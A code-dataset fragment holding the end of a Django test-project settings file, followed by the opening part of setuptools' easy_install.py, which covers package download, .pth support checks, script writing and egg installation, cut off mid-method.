see\nhttps://docs.djangoproject.com/en/1.9/ref/settings/\n\"\"\"\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '5bg%^f37a=%mh8(qkq1#)a$e*d-pt*dzox0_39-ywqh=@m(_ii'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [u'testserver']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'tests',\n]\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'project.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'tests', 'db.sqlite3'),\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n\n# Caching\n\nCACHE_DIR = os.path.join(BASE_DIR, '.cache')\n\nCACHES = {\n 'default': {\n 'BACKEND': 'diskcache.DjangoCache',\n 'LOCATION': CACHE_DIR,\n },\n}\n"} {"ext": "py", "sha": "1a2f56ae602d3bfd4f34db75bcdb1e42f9cd14d0", "content": "#!/usr/bin/env python\n\n\"\"\"\nEasy Install\n------------\n\nA tool for doing automatic download/extract/build of distutils-based Python\npackages. For detailed documentation, see the accompanying EasyInstall.txt\nfile, or visit the `EasyInstall home page`__.\n\n__ https://pythonhosted.org/setuptools/easy_install.html\n\n\"\"\"\n\nfrom glob import glob\nfrom distutils.util import get_platform\nfrom distutils.util import convert_path, subst_vars\nfrom distutils.errors import DistutilsArgError, DistutilsOptionError, \\\n DistutilsError, DistutilsPlatformError\nfrom distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS\nfrom distutils import log, dir_util\nfrom distutils.command.build_scripts import first_line_re\nimport sys\nimport os\nimport zipimport\nimport shutil\nimport tempfile\nimport zipfile\nimport re\nimport stat\nimport random\nimport platform\nimport textwrap\nimport warnings\nimport site\nimport struct\nimport contextlib\n\nfrom setuptools import Command\nfrom setuptools.sandbox import run_setup\nfrom setuptools.py31compat import get_path, get_config_vars\nfrom setuptools.command import setopt\nfrom setuptools.archive_util import unpack_archive\nfrom setuptools.package_index import PackageIndex\nfrom setuptools.package_index import URL_SCHEME\nfrom setuptools.command import bdist_egg, egg_info\nfrom setuptools.compat import (iteritems, maxsize, basestring, unicode,\n reraise, PY2, PY3)\nfrom pkg_resources import (\n yield_lines, normalize_path, resource_string, ensure_directory,\n get_distribution, find_distributions, Environment, Requirement,\n Distribution, PathMetadata, EggMetadata, WorkingSet, DistributionNotFound,\n VersionConflict, DEVELOP_DIST,\n)\nimport pkg_resources\n\n\n# Turn on PEP440Warnings\nwarnings.filterwarnings(\"default\", category=pkg_resources.PEP440Warning)\n\n\nsys_executable = os.environ.get('__PYVENV_LAUNCHER__',\n os.path.normpath(sys.executable))\n\n\n__all__ = [\n 'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg',\n 'main', 'get_exe_prefixes',\n]\n\n\ndef is_64bit():\n return struct.calcsize(\"P\") == 8\n\n\ndef samefile(p1, p2):\n both_exist = os.path.exists(p1) and os.path.exists(p2)\n use_samefile = hasattr(os.path, 'samefile') and both_exist\n if use_samefile:\n return os.path.samefile(p1, p2)\n norm_p1 = os.path.normpath(os.path.normcase(p1))\n norm_p2 = os.path.normpath(os.path.normcase(p2))\n return norm_p1 == norm_p2\n\n\nif PY2:\n def _to_ascii(s):\n return s\n\n def isascii(s):\n try:\n unicode(s, 'ascii')\n return True\n except UnicodeError:\n return False\nelse:\n def _to_ascii(s):\n return s.encode('ascii')\n\n def isascii(s):\n try:\n s.encode('ascii')\n return True\n except UnicodeError:\n return False\n\n\nclass easy_install(Command):\n \"\"\"Manage a download/build/install process\"\"\"\n description = \"Find/get/install Python packages\"\n command_consumes_arguments = True\n\n user_options = [\n ('prefix=', None, \"installation prefix\"),\n (\"zip-ok\", \"z\", \"install package as a zipfile\"),\n (\"multi-version\", \"m\", \"make apps have to require() a version\"),\n (\"upgrade\", \"U\", \"force upgrade (searches PyPI for latest versions)\"),\n (\"install-dir=\", \"d\", \"install package to DIR\"),\n (\"script-dir=\", \"s\", \"install scripts to DIR\"),\n (\"exclude-scripts\", \"x\", \"Don't install scripts\"),\n (\"always-copy\", \"a\", \"Copy all needed packages to install dir\"),\n (\"index-url=\", \"i\", \"base URL of Python Package Index\"),\n (\"find-links=\", \"f\", \"additional URL(s) to search for packages\"),\n (\"build-directory=\", \"b\",\n \"download/extract/build in DIR; keep the results\"),\n ('optimize=', 'O',\n \"also compile with optimization: -O1 for \\\"python -O\\\", \"\n \"-O2 for \\\"python -OO\\\", and -O0 to disable [default: -O0]\"),\n ('record=', None,\n \"filename in which to record list of installed files\"),\n ('always-unzip', 'Z', \"don't install as a zipfile, no matter what\"),\n ('site-dirs=', 'S', \"list of directories where .pth files work\"),\n ('editable', 'e', \"Install specified packages in editable form\"),\n ('no-deps', 'N', \"don't install dependencies\"),\n ('allow-hosts=', 'H', \"pattern(s) that hostnames must match\"),\n ('local-snapshots-ok', 'l',\n \"allow building eggs from local checkouts\"),\n ('version', None, \"print version information and exit\"),\n ('no-find-links', None,\n \"Don't load find-links defined in packages being installed\")\n ]\n boolean_options = [\n 'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy',\n 'editable',\n 'no-deps', 'local-snapshots-ok', 'version'\n ]\n\n if site.ENABLE_USER_SITE:\n help_msg = \"install in user site-package '%s'\" % site.USER_SITE\n user_options.append(('user', None, help_msg))\n boolean_options.append('user')\n\n negative_opt = {'always-unzip': 'zip-ok'}\n create_index = PackageIndex\n\n def initialize_options(self):\n if site.ENABLE_USER_SITE:\n whereami = os.path.abspath(__file__)\n self.user = whereami.startswith(site.USER_SITE)\n else:\n self.user = 0\n\n self.zip_ok = self.local_snapshots_ok = None\n self.install_dir = self.script_dir = self.exclude_scripts = None\n self.index_url = None\n self.find_links = None\n self.build_directory = None\n self.args = None\n self.optimize = self.record = None\n self.upgrade = self.always_copy = self.multi_version = None\n self.editable = self.no_deps = self.allow_hosts = None\n self.root = self.prefix = self.no_report = None\n self.version = None\n self.install_purelib = None # for pure module distributions\n self.install_platlib = None # non-pure (dists w/ extensions)\n self.install_headers = None # for C/C++ headers\n self.install_lib = None # set to either purelib or platlib\n self.install_scripts = None\n self.install_data = None\n self.install_base = None\n self.install_platbase = None\n if site.ENABLE_USER_SITE:\n self.install_userbase = site.USER_BASE\n self.install_usersite = site.USER_SITE\n else:\n self.install_userbase = None\n self.install_usersite = None\n self.no_find_links = None\n\n # Options not specifiable via command line\n self.package_index = None\n self.pth_file = self.always_copy_from = None\n self.site_dirs = None\n self.installed_projects = {}\n self.sitepy_installed = False\n # Always read easy_install options, even if we are subclassed, or have\n # an independent instance created. This ensures that defaults will\n # always come from the standard configuration file(s)' \"easy_install\"\n # section, even if this is a \"develop\" or \"install\" command, or some\n # other embedding.\n self._dry_run = None\n self.verbose = self.distribution.verbose\n self.distribution._set_command_options(\n self, self.distribution.get_option_dict('easy_install')\n )\n\n def delete_blockers(self, blockers):\n for filename in blockers:\n if os.path.exists(filename) or os.path.islink(filename):\n log.info(\"Deleting %s\", filename)\n if not self.dry_run:\n if (os.path.isdir(filename) and\n not os.path.islink(filename)):\n rmtree(filename)\n else:\n os.unlink(filename)\n\n def finalize_options(self):\n if self.version:\n print('setuptools %s' % get_distribution('setuptools').version)\n sys.exit()\n\n py_version = sys.version.split()[0]\n prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix')\n\n self.config_vars = {\n 'dist_name': self.distribution.get_name(),\n 'dist_version': self.distribution.get_version(),\n 'dist_fullname': self.distribution.get_fullname(),\n 'py_version': py_version,\n 'py_version_short': py_version[0:3],\n 'py_version_nodot': py_version[0] + py_version[2],\n 'sys_prefix': prefix,\n 'prefix': prefix,\n 'sys_exec_prefix': exec_prefix,\n 'exec_prefix': exec_prefix,\n # Only python 3.2+ has abiflags\n 'abiflags': getattr(sys, 'abiflags', ''),\n }\n\n if site.ENABLE_USER_SITE:\n self.config_vars['userbase'] = self.install_userbase\n self.config_vars['usersite'] = self.install_usersite\n\n # fix the install_dir if \"--user\" was used\n # XXX: duplicate of the code in the setup command\n if self.user and site.ENABLE_USER_SITE:\n self.create_home_path()\n if self.install_userbase is None:\n raise DistutilsPlatformError(\n \"User base directory is not specified\")\n self.install_base = self.install_platbase = self.install_userbase\n if os.name == 'posix':\n self.select_scheme(\"unix_user\")\n else:\n self.select_scheme(os.name + \"_user\")\n\n self.expand_basedirs()\n self.expand_dirs()\n\n self._expand('install_dir', 'script_dir', 'build_directory',\n 'site_dirs')\n # If a non-default installation directory was specified, default the\n # script directory to match it.\n if self.script_dir is None:\n self.script_dir = self.install_dir\n\n if self.no_find_links is None:\n self.no_find_links = False\n\n # Let install_dir get set by install_lib command, which in turn\n # gets its info from the install command, and takes into account\n # --prefix and --home and all that other crud.\n self.set_undefined_options(\n 'install_lib', ('install_dir', 'install_dir')\n )\n # Likewise, set default script_dir from 'install_scripts.install_dir'\n self.set_undefined_options(\n 'install_scripts', ('install_dir', 'script_dir')\n )\n\n if self.user and self.install_purelib:\n self.install_dir = self.install_purelib\n self.script_dir = self.install_scripts\n # default --record from the install command\n self.set_undefined_options('install', ('record', 'record'))\n # Should this be moved to the if statement below? It's not used\n # elsewhere\n normpath = map(normalize_path, sys.path)\n self.all_site_dirs = get_site_dirs()\n if self.site_dirs is not None:\n site_dirs = [\n os.path.expanduser(s.strip()) for s in\n self.site_dirs.split(',')\n ]\n for d in site_dirs:\n if not os.path.isdir(d):\n log.warn(\"%s (in --site-dirs) does not exist\", d)\n elif normalize_path(d) not in normpath:\n raise DistutilsOptionError(\n d + \" (in --site-dirs) is not on sys.path\"\n )\n else:\n self.all_site_dirs.append(normalize_path(d))\n if not self.editable:\n self.check_site_dir()\n self.index_url = self.index_url or \"https://pypi.python.org/simple\"\n self.shadow_path = self.all_site_dirs[:]\n for path_item in self.install_dir, normalize_path(self.script_dir):\n if path_item not in self.shadow_path:\n self.shadow_path.insert(0, path_item)\n\n if self.allow_hosts is not None:\n hosts = [s.strip() for s in self.allow_hosts.split(',')]\n else:\n hosts = ['*']\n if self.package_index is None:\n self.package_index = self.create_index(\n self.index_url, search_path=self.shadow_path, hosts=hosts,\n )\n self.local_index = Environment(self.shadow_path + sys.path)\n\n if self.find_links is not None:\n if isinstance(self.find_links, basestring):\n self.find_links = self.find_links.split()\n else:\n self.find_links = []\n if self.local_snapshots_ok:\n self.package_index.scan_egg_links(self.shadow_path + sys.path)\n if not self.no_find_links:\n self.package_index.add_find_links(self.find_links)\n self.set_undefined_options('install_lib', ('optimize', 'optimize'))\n if not isinstance(self.optimize, int):\n try:\n self.optimize = int(self.optimize)\n if not (0 <= self.optimize <= 2):\n raise ValueError\n except ValueError:\n raise DistutilsOptionError(\"--optimize must be 0, 1, or 2\")\n\n if self.editable and not self.build_directory:\n raise DistutilsArgError(\n \"Must specify a build directory (-b) when using --editable\"\n )\n if not self.args:\n raise DistutilsArgError(\n \"No urls, filenames, or requirements specified (see --help)\")\n\n self.outputs = []\n\n def _expand_attrs(self, attrs):\n for attr in attrs:\n val = getattr(self, attr)\n if val is not None:\n if os.name == 'posix' or os.name == 'nt':\n val = os.path.expanduser(val)\n val = subst_vars(val, self.config_vars)\n setattr(self, attr, val)\n\n def expand_basedirs(self):\n \"\"\"Calls `os.path.expanduser` on install_base, install_platbase and\n root.\"\"\"\n self._expand_attrs(['install_base', 'install_platbase', 'root'])\n\n def expand_dirs(self):\n \"\"\"Calls `os.path.expanduser` on install dirs.\"\"\"\n self._expand_attrs(['install_purelib', 'install_platlib',\n 'install_lib', 'install_headers',\n 'install_scripts', 'install_data', ])\n\n def run(self):\n if self.verbose != self.distribution.verbose:\n log.set_verbosity(self.verbose)\n try:\n for spec in self.args:\n self.easy_install(spec, not self.no_deps)\n if self.record:\n outputs = self.outputs\n if self.root: # strip any package prefix\n root_len = len(self.root)\n for counter in range(len(outputs)):\n outputs[counter] = outputs[counter][root_len:]\n from distutils import file_util\n\n self.execute(\n file_util.write_file, (self.record, outputs),\n \"writing list of installed files to '%s'\" %\n self.record\n )\n self.warn_deprecated_options()\n finally:\n log.set_verbosity(self.distribution.verbose)\n\n def pseudo_tempname(self):\n \"\"\"Return a pseudo-tempname base in the install directory.\n This code is intentionally naive; if a malicious party can write to\n the target directory you're already in deep doodoo.\n \"\"\"\n try:\n pid = os.getpid()\n except:\n pid = random.randint(0, maxsize)\n return os.path.join(self.install_dir, \"test-easy-install-%s\" % pid)\n\n def warn_deprecated_options(self):\n pass\n\n def check_site_dir(self):\n \"\"\"Verify that self.install_dir is .pth-capable dir, if needed\"\"\"\n\n instdir = normalize_path(self.install_dir)\n pth_file = os.path.join(instdir, 'easy-install.pth')\n\n # Is it a configured, PYTHONPATH, implicit, or explicit site dir?\n is_site_dir = instdir in self.all_site_dirs\n\n if not is_site_dir and not self.multi_version:\n # No? Then directly test whether it does .pth file processing\n is_site_dir = self.check_pth_processing()\n else:\n # make sure we can write to target dir\n testfile = self.pseudo_tempname() + '.write-test'\n test_exists = os.path.exists(testfile)\n try:\n if test_exists:\n os.unlink(testfile)\n open(testfile, 'w').close()\n os.unlink(testfile)\n except (OSError, IOError):\n self.cant_write_to_target()\n\n if not is_site_dir and not self.multi_version:\n # Can't install non-multi to non-site dir\n raise DistutilsError(self.no_default_version_msg())\n\n if is_site_dir:\n if self.pth_file is None:\n self.pth_file = PthDistributions(pth_file, self.all_site_dirs)\n else:\n self.pth_file = None\n\n PYTHONPATH = os.environ.get('PYTHONPATH', '').split(os.pathsep)\n if instdir not in map(normalize_path, [_f for _f in PYTHONPATH if _f]):\n # only PYTHONPATH dirs need a site.py, so pretend it's there\n self.sitepy_installed = True\n elif self.multi_version and not os.path.exists(pth_file):\n self.sitepy_installed = True # don't need site.py in this case\n self.pth_file = None # and don't create a .pth file\n self.install_dir = instdir\n\n def cant_write_to_target(self):\n template = \"\"\"can't create or remove files in install directory\n\nThe following error occurred while trying to add or remove files in the\ninstallation directory:\n\n %s\n\nThe installation directory you specified (via --install-dir, --prefix, or\nthe distutils default setting) was:\n\n %s\n\"\"\"\n msg = template % (sys.exc_info()[1], self.install_dir,)\n\n if not os.path.exists(self.install_dir):\n msg += \"\"\"\nThis directory does not currently exist. Please create it and try again, or\nchoose a different installation directory (using the -d or --install-dir\noption).\n\"\"\"\n else:\n msg += \"\"\"\nPerhaps your account does not have write access to this directory? If the\ninstallation directory is a system-owned directory, you may need to sign in\nas the administrator or \"root\" account. If you do not have administrative\naccess to this machine, you may wish to choose a different installation\ndirectory, preferably one that is listed in your PYTHONPATH environment\nvariable.\n\nFor information on other options, you may wish to consult the\ndocumentation at:\n\n https://pythonhosted.org/setuptools/easy_install.html\n\nPlease make the appropriate changes for your system and try again.\n\"\"\"\n raise DistutilsError(msg)\n\n def check_pth_processing(self):\n \"\"\"Empirically verify whether .pth files are supported in inst. dir\"\"\"\n instdir = self.install_dir\n log.info(\"Checking .pth file support in %s\", instdir)\n pth_file = self.pseudo_tempname() + \".pth\"\n ok_file = pth_file + '.ok'\n ok_exists = os.path.exists(ok_file)\n try:\n if ok_exists:\n os.unlink(ok_file)\n dirname = os.path.dirname(ok_file)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n f = open(pth_file, 'w')\n except (OSError, IOError):\n self.cant_write_to_target()\n else:\n try:\n f.write(\"import os; f = open(%r, 'w'); f.write('OK'); \"\n \"f.close()\\n\" % (ok_file,))\n f.close()\n f = None\n executable = sys.executable\n if os.name == 'nt':\n dirname, basename = os.path.split(executable)\n alt = os.path.join(dirname, 'pythonw.exe')\n if (basename.lower() == 'python.exe' and\n os.path.exists(alt)):\n # use pythonw.exe to avoid opening a console window\n executable = alt\n\n from distutils.spawn import spawn\n\n spawn([executable, '-E', '-c', 'pass'], 0)\n\n if os.path.exists(ok_file):\n log.info(\n \"TEST PASSED: %s appears to support .pth files\",\n instdir\n )\n return True\n finally:\n if f:\n f.close()\n if os.path.exists(ok_file):\n os.unlink(ok_file)\n if os.path.exists(pth_file):\n os.unlink(pth_file)\n if not self.multi_version:\n log.warn(\"TEST FAILED: %s does NOT support .pth files\", instdir)\n return False\n\n def install_egg_scripts(self, dist):\n \"\"\"Write all the scripts for `dist`, unless scripts are excluded\"\"\"\n if not self.exclude_scripts and dist.metadata_isdir('scripts'):\n for script_name in dist.metadata_listdir('scripts'):\n if dist.metadata_isdir('scripts/' + script_name):\n # The \"script\" is a directory, likely a Python 3\n # __pycache__ directory, so skip it.\n continue\n self.install_script(\n dist, script_name,\n dist.get_metadata('scripts/' + script_name)\n )\n self.install_wrapper_scripts(dist)\n\n def add_output(self, path):\n if os.path.isdir(path):\n for base, dirs, files in os.walk(path):\n for filename in files:\n self.outputs.append(os.path.join(base, filename))\n else:\n self.outputs.append(path)\n\n def not_editable(self, spec):\n if self.editable:\n raise DistutilsArgError(\n \"Invalid argument %r: you can't use filenames or URLs \"\n \"with --editable (except via the --find-links option).\"\n % (spec,)\n )\n\n def check_editable(self, spec):\n if not self.editable:\n return\n\n if os.path.exists(os.path.join(self.build_directory, spec.key)):\n raise DistutilsArgError(\n \"%r already exists in %s; can't do a checkout there\" %\n (spec.key, self.build_directory)\n )\n\n def easy_install(self, spec, deps=False):\n tmpdir = tempfile.mkdtemp(prefix=\"easy_install-\")\n download = None\n if not self.editable:\n self.install_site_py()\n\n try:\n if not isinstance(spec, Requirement):\n if URL_SCHEME(spec):\n # It's a url, download it to tmpdir and process\n self.not_editable(spec)\n download = self.package_index.download(spec, tmpdir)\n return self.install_item(None, download, tmpdir, deps,\n True)\n\n elif os.path.exists(spec):\n # Existing file or directory, just process it directly\n self.not_editable(spec)\n return self.install_item(None, spec, tmpdir, deps, True)\n else:\n spec = parse_requirement_arg(spec)\n\n self.check_editable(spec)\n dist = self.package_index.fetch_distribution(\n spec, tmpdir, self.upgrade, self.editable,\n not self.always_copy, self.local_index\n )\n if dist is None:\n msg = \"Could not find suitable distribution for %r\" % spec\n if self.always_copy:\n msg += \" (--always-copy skips system and development eggs)\"\n raise DistutilsError(msg)\n elif dist.precedence == DEVELOP_DIST:\n # .egg-info dists don't need installing, just process deps\n self.process_distribution(spec, dist, deps, \"Using\")\n return dist\n else:\n return self.install_item(spec, dist.location, tmpdir, deps)\n\n finally:\n if os.path.exists(tmpdir):\n rmtree(tmpdir)\n\n def install_item(self, spec, download, tmpdir, deps, install_needed=False):\n\n # Installation is also needed if file in tmpdir or is not an egg\n install_needed = install_needed or self.always_copy\n install_needed = install_needed or os.path.dirname(download) == tmpdir\n install_needed = install_needed or not download.endswith('.egg')\n install_needed = install_needed or (\n self.always_copy_from is not None and\n os.path.dirname(normalize_path(download)) ==\n normalize_path(self.always_copy_from)\n )\n\n if spec and not install_needed:\n # at this point, we know it's a local .egg, we just don't know if\n # it's already installed.\n for dist in self.local_index[spec.project_name]:\n if dist.location == download:\n break\n else:\n install_needed = True # it's not in the local index\n\n log.info(\"Processing %s\", os.path.basename(download))\n\n if install_needed:\n dists = self.install_eggs(spec, download, tmpdir)\n for dist in dists:\n self.process_distribution(spec, dist, deps)\n else:\n dists = [self.egg_distribution(download)]\n self.process_distribution(spec, dists[0], deps, \"Using\")\n\n if spec is not None:\n for dist in dists:\n if dist in spec:\n return dist\n\n def select_scheme(self, name):\n \"\"\"Sets the install directories by applying the install schemes.\"\"\"\n # it's the caller's problem if they supply a bad name!\n scheme = INSTALL_SCHEMES[name]\n for key in SCHEME_KEYS:\n attrname = 'install_' + key\n if getattr(self, attrname) is None:\n setattr(self, attrname, scheme[key])\n\n def process_distribution(self, requirement, dist, deps=True, *info):\n self.update_pth(dist)\n self.package_index.add(dist)\n if dist in self.local_index[dist.key]:\n self.local_index.remove(dist)\n self.local_index.add(dist)\n self.install_egg_scripts(dist)\n self.installed_projects[dist.key] = dist\n log.info(self.installation_report(requirement, dist, *info))\n if (dist.has_metadata('dependency_links.txt') and\n not self.no_find_links):\n self.package_index.add_find_links(\n dist.get_metadata_lines('dependency_links.txt')\n )\n if not deps and not self.always_copy:\n return\n elif requirement is not None and dist.key != requirement.key:\n log.warn(\"Skipping dependencies for %s\", dist)\n return # XXX this is not the distribution we were looking for\n elif requirement is None or dist not in requirement:\n # if we wound up with a different version, resolve what we've got\n distreq = dist.as_requirement()\n requirement = requirement or distreq\n requirement = Requirement(\n distreq.project_name, distreq.specs, requirement.extras\n )\n log.info(\"Processing dependencies for %s\", requirement)\n try:\n distros = WorkingSet([]).resolve(\n [requirement], self.local_index, self.easy_install\n )\n except DistributionNotFound:\n e = sys.exc_info()[1]\n raise DistutilsError(\n \"Could not find required distribution %s\" % e.args\n )\n except VersionConflict:\n e = sys.exc_info()[1]\n raise DistutilsError(\n \"Installed distribution %s conflicts with requirement %s\"\n % e.args\n )\n if self.always_copy or self.always_copy_from:\n # Force all the relevant distros to be copied or activated\n for dist in distros:\n if dist.key not in self.installed_projects:\n self.easy_install(dist.as_requirement())\n log.info(\"Finished processing dependencies for %s\", requirement)\n\n def should_unzip(self, dist):\n if self.zip_ok is not None:\n return not self.zip_ok\n if dist.has_metadata('not-zip-safe'):\n return True\n if not dist.has_metadata('zip-safe'):\n return True\n return False\n\n def maybe_move(self, spec, dist_filename, setup_base):\n dst = os.path.join(self.build_directory, spec.key)\n if os.path.exists(dst):\n msg = (\"%r already exists in %s; build directory %s will not be \"\n \"kept\")\n log.warn(msg, spec.key, self.build_directory, setup_base)\n return setup_base\n if os.path.isdir(dist_filename):\n setup_base = dist_filename\n else:\n if os.path.dirname(dist_filename) == setup_base:\n os.unlink(dist_filename) # get it out of the tmp dir\n contents = os.listdir(setup_base)\n if len(contents) == 1:\n dist_filename = os.path.join(setup_base, contents[0])\n if os.path.isdir(dist_filename):\n # if the only thing there is a directory, move it instead\n setup_base = dist_filename\n ensure_directory(dst)\n shutil.move(setup_base, dst)\n return dst\n\n def install_wrapper_scripts(self, dist):\n if not self.exclude_scripts:\n for args in get_script_args(dist):\n self.write_script(*args)\n\n def install_script(self, dist, script_name, script_text, dev_path=None):\n \"\"\"Generate a legacy script wrapper and install it\"\"\"\n spec = str(dist.as_requirement())\n is_script = is_python_script(script_text, script_name)\n\n if is_script:\n script_text = (get_script_header(script_text) +\n self._load_template(dev_path) % locals())\n self.write_script(script_name, _to_ascii(script_text), 'b')\n\n @staticmethod\n def _load_template(dev_path):\n \"\"\"\n There are a couple of template scripts in the package. This\n function loads one of them and prepares it for use.\n \"\"\"\n # See https://bitbucket.org/pypa/setuptools/issue/134 for info\n # on script file naming and downstream issues with SVR4\n name = 'script.tmpl'\n if dev_path:\n name = name.replace('.tmpl', ' (dev).tmpl')\n\n raw_bytes = resource_string('setuptools', name)\n return raw_bytes.decode('utf-8')\n\n def write_script(self, script_name, contents, mode=\"t\", blockers=()):\n \"\"\"Write an executable file to the scripts directory\"\"\"\n self.delete_blockers( # clean up old .py/.pyw w/o a script\n [os.path.join(self.script_dir, x) for x in blockers]\n )\n log.info(\"Installing %s script to %s\", script_name, self.script_dir)\n target = os.path.join(self.script_dir, script_name)\n self.add_output(target)\n\n mask = current_umask()\n if not self.dry_run:\n ensure_directory(target)\n if os.path.exists(target):\n os.unlink(target)\n f = open(target, \"w\" + mode)\n f.write(contents)\n f.close()\n chmod(target, 0o777 - mask)\n\n def install_eggs(self, spec, dist_filename, tmpdir):\n # .egg dirs or files are already built, so just return them\n if dist_filename.lower().endswith('.egg'):\n return [self.install_egg(dist_filename, tmpdir)]\n elif dist_filename.lower().endswith('.exe'):\n return [self.install_exe(dist_filename, tmpdir)]\n\n # Anything else, try to extract and build\n setup_base = tmpdir\n if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'):\n unpack_archive(dist_filename, tmpdir, self.unpack_progress)\n elif os.path.isdir(dist_filename):\n setup_base = os.path.abspath(dist_filename)\n\n if (setup_base.startswith(tmpdir) # something we downloaded\n and self.build_directory and spec is not None):\n setup_base = self.maybe_move(spec, dist_filename, setup_base)\n\n # Find the setup.py file\n setup_script = os.path.join(setup_base, 'setup.py')\n\n if not os.path.exists(setup_script):\n setups = glob(os.path.join(setup_base, '*', 'setup.py'))\n if not setups:\n raise DistutilsError(\n \"Couldn't find a setup script in %s\" %\n os.path.abspath(dist_filename)\n )\n if len(setups) > 1:\n raise DistutilsError(\n \"Multiple setup scripts in %s\" %\n os.path.abspath(dist_filename)\n )\n setup_script = setups[0]\n\n # Now run it, and return the result\n if self.editable:\n log.info(self.report_editable(spec, setup_script))\n return []\n else:\n return self.build_and_install(setup_script, setup_base)\n\n def egg_distribution(self, egg_path):\n if os.path.isdir(egg_path):\n metadata = PathMetadata(egg_path, os.path.join(egg_path,\n 'EGG-INFO'))\n else:\n metadata = EggMetadata(zipimport.zipimporter(egg_path))\n return Distribution.from_filename(egg_path, metadata=metadata)\n\n def install_egg(self, egg_path, tmpdir):\n destination = os.path.join(self.install_dir,\n os.path.basename(egg_path))\n destination = os.path.abspath(destination)\n if not self.dry_run:\n ensure_directory(destination)\n\n dist = self.egg_distribution(egg_path)\n if not samefile(egg_path, destination):\n if os.path.isdir(destination) and not os.path.islink(destination):\n dir_util.remove_tree(destination, dry_run=self.dry_run)\n elif os.path.exists(destination):\n self.execute(os.unlink, (destination,), \"Removing \" +\n destination)\n try:\n new_dist_is_zipped = False\n if os.path.isdir(egg_path):\n if egg_path.startswith(tmpdir):\n f, m = shutil.move, \"Moving\"\n else:\n f, m = shutil.copytree, \"Copying\"\n elif self.should_unzip(dist):\n self.mkpath(destination)\n f, m = self.unpack_and_compile, \"Extracting\"\n else:\n new_dist_is_zipped = True\n if egg_path.startswith(tmpdir):\n f, m = shutil.move, \"Moving\"\n else:\n f, m = shutil.copy2, \"Copying\"\n self.execute(f, (egg_path, destination),\n (m + \" %s to %s\") %\n (os.path.basename(egg_path),\n os.path.dirname(destination)))\n update_dist_caches(destination,\n fix_zipimporter_caches=new_dist_is_zipped)\n except:\n update_dist_caches(destination, fix_zipimporter_caches=False)\n raise\n\n self.add_output(destination)\n return self.egg_distribution(destination)\n\n def install_exe(self, dist_filename, tmpdir):\n # See if it's valid, get data\n cfg = extract_wininst_cfg(dist_filename)\n if cfg is None:\n raise DistutilsError(\n \"%s is not a valid distutils Windows .exe\" % dist_filename\n )\n # Create a dummy distribution object until we build the real distro\n dist = Distribution(\n None,\n project_name=cfg.get('metadata', 'name'),\n version=cfg.get('metadata', 'version'), platform=get_platform(),\n )\n\n # Convert the .exe to an unpacked egg\n egg_path = dist.location = os.path.join(tmpdir, dist.egg_name() +\n '.egg')\n egg_tmp = egg_path + '.tmp'\n _egg_info = os.path.join(egg_tmp, 'EGG-INFO')\n pkg_inf = os.path.join(_egg_info, 'PKG-INFO')\n ensure_directory(pkg_inf) # make sure EGG-INFO dir exists\n dist._provider = PathMetadata(egg_tmp, _egg_info) # XXX\n self.exe_to_egg(dist_filename, egg_tmp)\n\n # Write EGG-INFO/PKG-INFO\n if not os.path.exists(pkg_inf):\n f = open(pkg_inf, 'w')\n f.write('Metadata-Version: 1.0\\n')\n for k, v in cfg.items('metadata'):\n if k != 'target_version':\n f.write('%s: %s\\n' % (k.replace('_', '-').title(), v))\n f.close()\n script_dir = os.path.join(_egg_info, 'scripts')\n self.delete_blockers( # delete entry-point scripts to avoid duping\n [os.path.join(script_dir, args[0]) for args in\n get_script_args(dist)]\n )\n # Build .egg file from tmpdir\n bdist_egg.make_zipfile(\n egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run\n )\n # install the .egg\n return self.install_egg(egg_path, tmpdir)\n\n def 